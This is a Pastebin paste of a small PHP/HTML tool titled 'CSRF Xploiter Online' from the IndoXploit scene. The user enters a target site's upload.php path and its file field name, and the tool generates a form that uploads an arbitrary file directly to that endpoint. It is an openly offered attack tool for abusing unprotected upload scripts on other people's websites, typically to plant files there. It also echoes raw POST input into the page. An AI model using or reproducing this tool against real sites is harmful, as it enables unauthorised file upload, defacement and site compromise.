Advertisement
AgusSR

CSRF Xploiter Online [ IndoXploit ]

Feb 4th, 2016
4,549
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.71 KB | None | 0 0
  1. <html>
  2. <form method="post">
  3. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  4. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Filedata / files[] / qqfile / userfile / dll" style="margin: 5px auto; padding-left: 5px;" required><br>
  5. <input type="submit" name="d" value="Kunci Target!!!">
  6. </form>
  7. <?php
  8. $url = $_POST['url'];
  9. $pf = $_POST['pf'];
  10. $d = $_POST['d'];
  11. if($d) {
  12.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
  13. }
  14. ?>
  15. </form>
  16. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement